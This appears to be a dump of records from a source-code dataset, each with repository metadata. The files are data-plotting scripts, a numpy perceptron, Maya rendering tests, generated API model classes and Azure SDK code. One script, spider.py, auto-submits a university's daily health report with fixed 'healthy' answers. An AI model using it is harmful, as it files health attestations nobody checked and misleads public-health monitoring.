shanghaiData = pd.read_csv("../input/shanghaiData.csv")
cwurData = pd.read_csv("../input/cwurData.csv")
# Print off a list of universities
all_university_names = set(timesData.university_name).union(set(shanghaiData.university_name)).union(set(cwurData.institution))
all_university_names_list = [str(i) for i in (list(all_university_names))]
print("List of All Universities in Dataset")
print("-----------------------------------")
print ('\n'.join([ str(university) for university in sorted(all_university_names_list) ]))
times_plot_data = timesData[timesData.university_name.isin(my_university_name)][['world_rank','year']]
shanghai_plot_data = shanghaiData[shanghaiData.university_name.isin(my_university_name)][['world_rank','year']]
cwur_plot_data = cwurData[cwurData.institution.isin(my_university_name)][['world_rank','year']]
times_plot_data['source'] = 'Times'
shanghai_plot_data['source'] = 'Shanghai'
cwur_plot_data['source'] = 'CWUR'
# parse the first number in rank for data ranges
times_plot_data['world_rank'] = times_plot_data['world_rank'].str.split('-').str[0]
shanghai_plot_data['world_rank'] = shanghai_plot_data['world_rank'].str.split('-').str[0]
plot_data = times_plot_data.append(shanghai_plot_data).append(cwur_plot_data)
plot_data['world_rank'] = plot_data['world_rank'].astype(int)
ax = sns.pointplot(x='year',y='world_rank',hue='source',data=plot_data);
# Styling
plt.title(my_university_name[0] + " Ranking", fontsize=26)
plt.xticks(fontsize=20)
plt.yticks(fontsize=20)
plt.ylabel("World Rank", fontsize=26)
plt.xlabel("Year", fontsize=26)
plt.tight_layout()
plt.legend(loc='upper left',fontsize=20)
ax.spines["top"].set_visible(False)
ax.spines["right"].set_visible(False)
ax.get_xaxis().tick_bottom()
ax.get_yaxis().tick_left()
# Save File
plt.savefig('university.png')
| 38.057971
| 127
| 0.734196
|
9c140aafc2db2af7e2f5557e9135745c5103d8ae
| 2,293
|
py
|
Python
|
MLP/MLP.py
|
wicky1234444/MyMLCodes
|
8f7b37beb354d32b39d90ef370aefa13e45eee3f
|
[
"MIT"
] | null | null | null |
MLP/MLP.py
|
wicky1234444/MyMLCodes
|
8f7b37beb354d32b39d90ef370aefa13e45eee3f
|
[
"MIT"
] | null | null | null |
MLP/MLP.py
|
wicky1234444/MyMLCodes
|
8f7b37beb354d32b39d90ef370aefa13e45eee3f
|
[
"MIT"
] | null | null | null |
import numpy as np
class MLP: ##multi layer perceptron
def __init__(self, layer_dimensions, lr, activation_function='sigmoid'):
self.W = [] ## weights
self.B = [] ## biases
for i in range(len(layer_dimensions)-1): ## weight and bias initialization ~ uniform(0,1)
Weights = np.random.uniform(0,1, (layer_dimensions[i+1], layer_dimensions[i]))
bias = np.random.uniform(0,1, layer_dimensions[i+1])
self.W.append(Weights)
self.B.append(bias)
self.lr = lr
self.act = activation_function ##sigmoid is used for now
def Forward(self, input): ## feed the input forward into the network and calculate layer wise outputs
L = len(self.W)
layer_wise_outputs = []
layer_wise_outputs.append(input)
for i in range(L):
output = np.dot(layer_wise_outputs[-1],np.transpose(self.W[i]))
output+=self.B[i]
if self.act == 'sigmoid': ## non-linear activation
output = 1/(1+np.exp(-output))
elif self.act == 'tanh':
output = np.tanh(output)
elif self.act == 'relu':
                output = np.maximum(output, 0)
layer_wise_outputs.append(output)
return layer_wise_outputs
def gradient_calci(self, outputs, target):
error = (target-outputs[-1])
W_grad = [] ## gradients for weights
B_grad = [] ## local gradients (also gradients for biases)
B_grad.append(np.multiply(error, np.multiply(1-outputs[-1],outputs[-1])))
for i in reversed(range(len(self.W))):
W_grad.append(np.dot(B_grad[-1].reshape(-1,1), outputs[i].reshape(1,-1)))
gr = np.dot(B_grad[-1], self.W[i])
gr = np.multiply(np.multiply(1-outputs[i], outputs[i]), gr)
B_grad.append(gr)
return [W_grad, B_grad]
def backprop(self, grad):
        k=0 ## update the weights and biases of the network based on gradients from gradient_calci
W_grad = grad[0]
B_grad = grad[1]
for i in reversed(range(len(self.W))):
self.W[i]+=self.lr*W_grad[k]
self.B[i]+=self.lr*B_grad[k]
k+=1
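# --- Training sketch (hypothetical; not part of the original file) ---
# Assumes one 1-D sample vector per call, the sigmoid activation, and the
# squared-error gradient that gradient_calci implements. Convergence on XOR
# from uniform(0, 1) initial weights is not guaranteed; this only demonstrates
# the Forward -> gradient_calci -> backprop loop.
if __name__ == "__main__":
    net = MLP([2, 3, 1], lr=0.5)
    X = np.array([[0., 0.], [0., 1.], [1., 0.], [1., 1.]])
    Y = np.array([[0.], [1.], [1.], [0.]])
    for _ in range(5000):
        for x, y in zip(X, Y):
            outputs = net.Forward(x)
            net.backprop(net.gradient_calci(outputs, y))
    print([net.Forward(x)[-1].item() for x in X])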
| 44.960784
| 115
| 0.557785
|
8821d6edf40de8c49f21ff58cb64078872cec28c
| 465
|
py
|
Python
|
Python/Programming Fundamentals/Dictionaries/01. A Minor Task.py
|
teodoramilcheva/softuni-software-engineering
|
98dc9faa66f42570f6538fd7ef186d2bd1d39bff
|
[
"MIT"
] | null | null | null |
Python/Programming Fundamentals/Dictionaries/01. A Minor Task.py
|
teodoramilcheva/softuni-software-engineering
|
98dc9faa66f42570f6538fd7ef186d2bd1d39bff
|
[
"MIT"
] | null | null | null |
Python/Programming Fundamentals/Dictionaries/01. A Minor Task.py
|
teodoramilcheva/softuni-software-engineering
|
98dc9faa66f42570f6538fd7ef186d2bd1d39bff
|
[
"MIT"
] | null | null | null |
def validate_key_existing(dictionary, key, def_value=0):
if key not in dictionary:
dictionary[key] = def_value
def print_dict(dictionary, template):
for k, v in dictionary.items():
print(template.format(k, v))
resources = {}
while True:
entry = input()
if entry == 'stop':
break
quantity = int(input())
validate_key_existing(resources, entry)
resources[entry] += quantity
print_dict(resources, '{} -> {}')
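# --- Design note (hypothetical alternative, not part of the original solution) ---
# The same aggregation can be written with collections.defaultdict, which makes
# validate_key_existing unnecessary; shown here only as an illustration.
#
# from collections import defaultdict
# resources = defaultdict(int)
# while (entry := input()) != 'stop':
#     resources[entry] += int(input())
# print_dict(resources, '{} -> {}')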
| 20.217391
| 56
| 0.643011
|
fe6601829fda62c4bfa3c15a3ad22879563a562c
| 5,746
|
py
|
Python
|
test/lib/mayaUsd/render/mayaToHydra/testMtohVisibility.py
|
ika-rporter/maya-usd
|
8f216a4fb955fc44c0abda55caa53ed295aaa625
|
[
"Apache-2.0"
] | 507
|
2019-07-30T20:05:10.000Z
|
2022-03-30T07:38:43.000Z
|
test/lib/mayaUsd/render/mayaToHydra/testMtohVisibility.py
|
ika-rporter/maya-usd
|
8f216a4fb955fc44c0abda55caa53ed295aaa625
|
[
"Apache-2.0"
] | 1,188
|
2019-07-31T11:27:27.000Z
|
2022-03-31T21:06:06.000Z
|
test/lib/mayaUsd/render/mayaToHydra/testMtohVisibility.py
|
ika-rporter/maya-usd
|
8f216a4fb955fc44c0abda55caa53ed295aaa625
|
[
"Apache-2.0"
] | 165
|
2019-07-30T22:27:57.000Z
|
2022-03-25T07:20:23.000Z
|
import maya.cmds as cmds
import fixturesUtils
import mtohUtils
class TestCommand(mtohUtils.MtohTestCase):
_file = __file__
def setUp(self):
self.makeCubeScene(camDist=6)
self.assertTrue(cmds.getAttr("{}.visibility".format(self.cubeTrans)))
self.assertTrue(cmds.getAttr("{}.visibility".format(self.cubeShape)))
def test_toggleTransVis(self):
# because snapshotting is slow, we only use it in this test - otherwise
# we assume the results of `listRenderIndex=..., visibileOnly=1` are
# sufficient
cubeUnselectedImg = "cube_unselected.png"
nothingImg = "nothing.png"
cmds.refresh()
self.assertIn(
self.cubeRprim,
self.getVisibleIndex())
self.assertSnapshotClose(cubeUnselectedImg)
cmds.setAttr("{}.visibility".format(self.cubeTrans), False)
self.assertFalse(cmds.getAttr("{}.visibility".format(self.cubeTrans)))
cmds.refresh()
self.assertNotIn(
self.cubeRprim,
self.getVisibleIndex())
self.assertSnapshotClose(nothingImg)
cmds.setAttr("{}.visibility".format(self.cubeTrans), True)
self.assertTrue(cmds.getAttr("{}.visibility".format(self.cubeTrans)))
cmds.refresh()
self.assertIn(
self.cubeRprim,
self.getVisibleIndex())
self.assertSnapshotClose(cubeUnselectedImg)
def test_toggleShapeVis(self):
cmds.setAttr("{}.visibility".format(self.cubeShape), False)
self.assertFalse(cmds.getAttr("{}.visibility".format(self.cubeShape)))
cmds.refresh()
self.assertNotIn(
self.cubeRprim,
self.getVisibleIndex())
cmds.setAttr("{}.visibility".format(self.cubeShape), True)
self.assertTrue(cmds.getAttr("{}.visibility".format(self.cubeShape)))
cmds.refresh()
self.assertIn(
self.cubeRprim,
self.getVisibleIndex())
def test_toggleBothVis(self):
cmds.setAttr("{}.visibility".format(self.cubeTrans), False)
self.assertFalse(cmds.getAttr("{}.visibility".format(self.cubeTrans)))
cmds.setAttr("{}.visibility".format(self.cubeShape), False)
self.assertFalse(cmds.getAttr("{}.visibility".format(self.cubeShape)))
cmds.refresh()
self.assertNotIn(
self.cubeRprim,
self.getVisibleIndex())
cmds.setAttr("{}.visibility".format(self.cubeTrans), True)
self.assertTrue(cmds.getAttr("{}.visibility".format(self.cubeTrans)))
cmds.setAttr("{}.visibility".format(self.cubeShape), True)
self.assertTrue(cmds.getAttr("{}.visibility".format(self.cubeShape)))
cmds.refresh()
self.assertIn(
self.cubeRprim,
self.getVisibleIndex())
def doHierarchicalVisibilityTest(self, makeNodeVis, makeNodeInvis, prep=None):
lowGroup = cmds.group(self.cubeTrans, name='lowGroup')
midGroup = cmds.group(lowGroup, name='midGroup')
highGroup = cmds.group(midGroup, name='highGroup')
        hier = [highGroup, midGroup, lowGroup, self.cubeTrans, self.cubeShape]
cmds.select(clear=1)
cmds.refresh()
self.cubeRprim = self.rprimPath(self.cubeShape)
visIndex = [self.cubeRprim]
self.assertEqual(self.getVisibleIndex(), visIndex)
if prep is not None:
for obj in hier:
prep(obj)
self.assertEqual(self.getVisibleIndex(), visIndex)
for obj in hier:
makeNodeInvis(obj)
cmds.refresh()
self.assertEqual(self.getVisibleIndex(), [])
makeNodeVis(obj)
cmds.refresh()
self.assertEqual(self.getVisibleIndex(), visIndex)
def test_hierarchicalVisibility(self):
def makeNodeVis(obj):
cmds.setAttr("{}.visibility".format(obj), True)
def makeNodeInvis(obj):
cmds.setAttr("{}.visibility".format(obj), False)
self.doHierarchicalVisibilityTest(makeNodeVis, makeNodeInvis)
def test_hierarchicalIntermediateObject(self):
def makeNodeVis(obj):
cmds.setAttr("{}.intermediateObject".format(obj), False)
def makeNodeInvis(obj):
cmds.setAttr("{}.intermediateObject".format(obj), True)
self.doHierarchicalVisibilityTest(makeNodeVis, makeNodeInvis)
def test_hierarchicalOverrideEnabled(self):
def makeNodeVis(obj):
cmds.setAttr("{}.overrideEnabled".format(obj), False)
def makeNodeInvis(obj):
cmds.setAttr("{}.overrideEnabled".format(obj), True)
def prep(obj):
# set the overrideVisibility to False - as long as the
# overrideEnabled is NOT set, the object should still
# be visible
cmds.setAttr("{}.overrideVisibility".format(obj), False)
cmds.setAttr("{}.overrideEnabled".format(obj), False)
self.doHierarchicalVisibilityTest(makeNodeVis, makeNodeInvis, prep=prep)
def test_hierarchicalOverrideVisibility(self):
def makeNodeVis(obj):
cmds.setAttr("{}.overrideVisibility".format(obj), True)
def makeNodeInvis(obj):
cmds.setAttr("{}.overrideVisibility".format(obj), False)
def prep(obj):
# set the overrideEnabled to True - as long as the
# overrideVisibility is True, the object should still
# be visible
cmds.setAttr("{}.overrideEnabled".format(obj), True)
cmds.setAttr("{}.overrideVisibility".format(obj), True)
self.doHierarchicalVisibilityTest(makeNodeVis, makeNodeInvis, prep=prep)
if __name__ == '__main__':
fixturesUtils.runTests(globals())
| 36.833333
| 82
| 0.635921
|
b26521855377abfff08c3196d86305bd36b6bf0a
| 4,569
|
py
|
Python
|
rustici_software_cloud_v2/models/settings_individual_schema.py
|
RusticiSoftware/scormcloud-api-v2-client-python
|
04e2cce304a336caf492c3330c706840815c4abe
|
[
"Apache-2.0"
] | 2
|
2020-07-21T10:33:39.000Z
|
2021-08-17T21:40:13.000Z
|
rustici_software_cloud_v2/models/settings_individual_schema.py
|
RusticiSoftware/scormcloud-api-v2-client-python
|
04e2cce304a336caf492c3330c706840815c4abe
|
[
"Apache-2.0"
] | 2
|
2020-10-22T20:58:19.000Z
|
2020-10-27T17:25:28.000Z
|
rustici_software_cloud_v2/models/settings_individual_schema.py
|
RusticiSoftware/scormcloud-api-v2-client-python
|
04e2cce304a336caf492c3330c706840815c4abe
|
[
"Apache-2.0"
] | 1
|
2020-10-15T17:11:15.000Z
|
2020-10-15T17:11:15.000Z
|
# coding: utf-8
"""
SCORM Cloud Rest API
REST API used for SCORM Cloud integrations. # noqa: E501
OpenAPI spec version: 2.0
Contact: systems@rusticisoftware.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class SettingsIndividualSchema(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'setting_id': 'str',
'value': 'str',
'explicit': 'bool'
}
attribute_map = {
'setting_id': 'settingId',
'value': 'value',
'explicit': 'explicit'
}
def __init__(self, setting_id=None, value=None, explicit=False): # noqa: E501
"""SettingsIndividualSchema - a model defined in Swagger""" # noqa: E501
self._setting_id = None
self._value = None
self._explicit = None
self.discriminator = None
if setting_id is not None:
self.setting_id = setting_id
if value is not None:
self.value = value
if explicit is not None:
self.explicit = explicit
@property
def setting_id(self):
"""Gets the setting_id of this SettingsIndividualSchema. # noqa: E501
:return: The setting_id of this SettingsIndividualSchema. # noqa: E501
:rtype: str
"""
return self._setting_id
@setting_id.setter
def setting_id(self, setting_id):
"""Sets the setting_id of this SettingsIndividualSchema.
:param setting_id: The setting_id of this SettingsIndividualSchema. # noqa: E501
:type: str
"""
self._setting_id = setting_id
@property
def value(self):
"""Gets the value of this SettingsIndividualSchema. # noqa: E501
:return: The value of this SettingsIndividualSchema. # noqa: E501
:rtype: str
"""
return self._value
@value.setter
def value(self, value):
"""Sets the value of this SettingsIndividualSchema.
:param value: The value of this SettingsIndividualSchema. # noqa: E501
:type: str
"""
self._value = value
@property
def explicit(self):
"""Gets the explicit of this SettingsIndividualSchema. # noqa: E501
:return: The explicit of this SettingsIndividualSchema. # noqa: E501
:rtype: bool
"""
return self._explicit
@explicit.setter
def explicit(self, explicit):
"""Sets the explicit of this SettingsIndividualSchema.
:param explicit: The explicit of this SettingsIndividualSchema. # noqa: E501
:type: bool
"""
self._explicit = explicit
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(SettingsIndividualSchema, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, SettingsIndividualSchema):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 28.203704
| 89
| 0.578901
|
fd2a5c4ab2933d57694cdfb1a76cceacc6faab6e
| 5,170
|
py
|
Python
|
build/PureCloudPlatformClientV2/models/section.py
|
cjohnson-ctl/platform-client-sdk-python
|
38ce53bb8012b66e8a43cc8bd6ff00cf6cc99100
|
[
"MIT"
] | 10
|
2019-02-22T00:27:08.000Z
|
2021-09-12T23:23:44.000Z
|
libs/PureCloudPlatformClientV2/models/section.py
|
rocketbot-cl/genesysCloud
|
dd9d9b5ebb90a82bab98c0d88b9585c22c91f333
|
[
"MIT"
] | 5
|
2018-06-07T08:32:00.000Z
|
2021-07-28T17:37:26.000Z
|
libs/PureCloudPlatformClientV2/models/section.py
|
rocketbot-cl/genesysCloud
|
dd9d9b5ebb90a82bab98c0d88b9585c22c91f333
|
[
"MIT"
] | 6
|
2020-04-09T17:43:07.000Z
|
2022-02-17T08:48:05.000Z
|
# coding: utf-8
"""
Copyright 2016 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Ref: https://github.com/swagger-api/swagger-codegen
"""
from pprint import pformat
from six import iteritems
import re
import json
from ..utils import sanitize_for_serialization
class Section(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self):
"""
Section - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'field_list': 'list[FieldList]',
'instruction_text': 'str',
'key': 'str',
'state': 'str'
}
self.attribute_map = {
'field_list': 'fieldList',
'instruction_text': 'instructionText',
'key': 'key',
'state': 'state'
}
self._field_list = None
self._instruction_text = None
self._key = None
self._state = None
@property
def field_list(self):
"""
Gets the field_list of this Section.
:return: The field_list of this Section.
:rtype: list[FieldList]
"""
return self._field_list
@field_list.setter
def field_list(self, field_list):
"""
Sets the field_list of this Section.
:param field_list: The field_list of this Section.
:type: list[FieldList]
"""
self._field_list = field_list
@property
def instruction_text(self):
"""
Gets the instruction_text of this Section.
:return: The instruction_text of this Section.
:rtype: str
"""
return self._instruction_text
@instruction_text.setter
def instruction_text(self, instruction_text):
"""
Sets the instruction_text of this Section.
:param instruction_text: The instruction_text of this Section.
:type: str
"""
self._instruction_text = instruction_text
@property
def key(self):
"""
Gets the key of this Section.
:return: The key of this Section.
:rtype: str
"""
return self._key
@key.setter
def key(self, key):
"""
Sets the key of this Section.
:param key: The key of this Section.
:type: str
"""
self._key = key
@property
def state(self):
"""
Gets the state of this Section.
:return: The state of this Section.
:rtype: str
"""
return self._state
@state.setter
def state(self, state):
"""
Sets the state of this Section.
:param state: The state of this Section.
:type: str
"""
self._state = state
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_json(self):
"""
Returns the model as raw JSON
"""
return json.dumps(sanitize_for_serialization(self.to_dict()))
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| 24.736842
| 77
| 0.551064
|
67d66d90e0b4c0998d6a63e938faf34b6af6a669
| 1,692
|
py
|
Python
|
health_report_helper/spider.py
|
why36/actions-NjuHealthReport
|
72f31024937362fa9b2e0039cf6f8ec2e817b78d
|
[
"MIT"
] | null | null | null |
health_report_helper/spider.py
|
why36/actions-NjuHealthReport
|
72f31024937362fa9b2e0039cf6f8ec2e817b78d
|
[
"MIT"
] | null | null | null |
health_report_helper/spider.py
|
why36/actions-NjuHealthReport
|
72f31024937362fa9b2e0039cf6f8ec2e817b78d
|
[
"MIT"
] | 4
|
2021-11-12T14:40:03.000Z
|
2022-03-01T10:33:54.000Z
|
# -*- coding: utf-8 -*-
#!/usr/bin/env python
# Copyright 2020 zhangt2333. All Rights Reserved.
# Author-Github: github.com/zhangt2333
# spider.py 2021/9/11 13:01
import json
import requests
import config
from uniform_login.uniform_login_spider import login
import utils
def get_apply_list(cookies):
try:
response = requests.get(
url='http://ehallapp.nju.edu.cn/xgfw/sys/yqfxmrjkdkappnju/apply/getApplyInfoList.do',
headers=config.HEADERS,
cookies=cookies
)
data = json.loads(response.text)
return data['data']
except Exception as e:
print(e)
exit(-1)
def do_apply(cookies, WID, location):
try:
response = requests.get(
url='http://ehallapp.nju.edu.cn/xgfw/sys/yqfxmrjkdkappnju/apply/saveApplyInfos.do',
params=dict(
WID=WID,
IS_TWZC=1,
IS_HAS_JKQK=1,
JRSKMYS=1,
JZRJRSKMYS=1,
CURR_LOCATION=location
),
headers=config.HEADERS,
cookies=cookies
)
        if not (response.status_code == 200 and '成功' in response.text):  # '成功' means "success"
            raise Exception('Health report submission failed')
except Exception as e:
print(e)
exit(-1)
def main(username, password, location):
    # Log in
cookies = login(username, password, 'http://ehallapp.nju.edu.cn/xgfw/sys/yqfxmrjkdkappnju/apply/getApplyInfoList.do')
    # Fetch the list of report entries
apply_list = get_apply_list(cookies)
if not apply_list[0]['TBRQ'] == utils.get_GMT8_str('%Y-%m-%d'):
        print("Today's health report form has not been published yet")
exit(-1)
    # Submit today's report
do_apply(cookies, apply_list[0]['WID'], location)
| 28.677966
| 121
| 0.599291
|
4ff9b1033d63c8c8df3537409872f1c235c8461d
| 2,137
|
py
|
Python
|
alexmods/plot_spectrum.py
|
alexji/alexmods
|
702f933e717256c0f055288f5f7c7341ac19b126
|
[
"MIT"
] | 1
|
2018-06-02T09:47:31.000Z
|
2018-06-02T09:47:31.000Z
|
alexmods/plot_spectrum.py
|
alexji/alexmods
|
702f933e717256c0f055288f5f7c7341ac19b126
|
[
"MIT"
] | 3
|
2018-08-24T07:41:22.000Z
|
2018-10-29T15:54:17.000Z
|
alexmods/plot_spectrum.py
|
alexji/alexmods
|
702f933e717256c0f055288f5f7c7341ac19b126
|
[
"MIT"
] | null | null | null |
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.ticker import MultipleLocator, ScalarFormatter
from .specutils import Spectrum1D
def plot_spectrum(spec, wlmin=None, wlmax=None, ax=None,
dxmaj=None, dxmin=None, dymaj=None, dymin=None,
fillcolor="#cccccc",fillalpha=1,
**kwargs):
if ax is None:
fig, ax = plt.subplots()
wave = spec.dispersion
flux = spec.flux
errs = spec.ivar**-0.5
ii = np.ones(len(wave), dtype=bool)
if wlmin is not None:
ii = ii & (wave > wlmin)
if wlmax is not None:
ii = ii & (wave < wlmax)
wave = wave[ii]
flux = flux[ii]
errs = errs[ii]
y1 = flux-errs
y2 = flux+errs
fill_between_steps(ax, wave, y1, y2, alpha=fillalpha, facecolor=fillcolor, edgecolor=fillcolor)
ax.plot(wave, flux, **kwargs)
ax.xaxis.set_major_formatter(ScalarFormatter(useOffset=False))
if dxmaj is not None: ax.xaxis.set_major_locator(MultipleLocator(dxmaj))
if dxmin is not None: ax.xaxis.set_minor_locator(MultipleLocator(dxmin))
if dymaj is not None: ax.yaxis.set_major_locator(MultipleLocator(dymaj))
if dymin is not None: ax.yaxis.set_minor_locator(MultipleLocator(dymin))
return ax
def fill_between_steps(ax, x, y1, y2=0, h_align='mid', **kwargs):
"""
Fill between for step plots in matplotlib.
**kwargs will be passed to the matplotlib fill_between() function.
"""
# First, duplicate the x values
xx = x.repeat(2)[1:]
# Now: the average x binwidth
xstep = np.repeat((x[1:] - x[:-1]), 2)
xstep = np.concatenate(([xstep[0]], xstep, [xstep[-1]]))
# Now: add one step at end of row.
xx = np.append(xx, xx.max() + xstep[-1])
    # Make it possible to change step alignment.
if h_align == 'mid':
xx -= xstep / 2.
elif h_align == 'right':
xx -= xstep
# Also, duplicate each y coordinate in both arrays
y1 = y1.repeat(2)#[:-1]
if type(y2) == np.ndarray:
y2 = y2.repeat(2)#[:-1]
# now to the plotting part:
return ax.fill_between(xx, y1, y2=y2, **kwargs)
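# --- Usage sketch for fill_between_steps (illustration; synthetic data) ---
# Demonstrates the step-aligned error band on stand-in arrays; plot_spectrum
# wires the same call to a Spectrum1D's dispersion, flux and ivar arrays.
def _demo_fill_between_steps():
    wave = np.linspace(4000., 4010., 50)
    flux = 1.0 + 0.05 * np.random.randn(50)
    errs = np.full(50, 0.05)
    fig, ax = plt.subplots()
    fill_between_steps(ax, wave, flux - errs, flux + errs,
                       facecolor="#cccccc", edgecolor="#cccccc")
    ax.plot(wave, flux, drawstyle="steps-mid", c="k")
    return ax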
| 32.378788
| 99
| 0.628451
|
90c4dda54ed9eb6069d58e05469577e7938c5c2f
| 24,173
|
py
|
Python
|
sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_09_01/aio/operations/_virtual_routers_operations.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 3
|
2020-06-23T02:25:27.000Z
|
2021-09-07T18:48:11.000Z
|
sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_09_01/aio/operations/_virtual_routers_operations.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 510
|
2019-07-17T16:11:19.000Z
|
2021-08-02T08:38:32.000Z
|
sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_09_01/aio/operations/_virtual_routers_operations.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 5
|
2019-09-04T12:51:37.000Z
|
2020-09-16T07:28:40.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class VirtualRoutersOperations:
"""VirtualRoutersOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2019_09_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def _delete_initial(
self,
resource_group_name: str,
virtual_router_name: str,
**kwargs
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-09-01"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}'} # type: ignore
async def begin_delete(
self,
resource_group_name: str,
virtual_router_name: str,
**kwargs
) -> AsyncLROPoller[None]:
"""Deletes the specified Virtual Router.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_router_name: The name of the Virtual Router.
:type virtual_router_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: Pass in True if you'd like the AsyncARMPolling polling method,
False for no polling, or your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
virtual_router_name=virtual_router_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
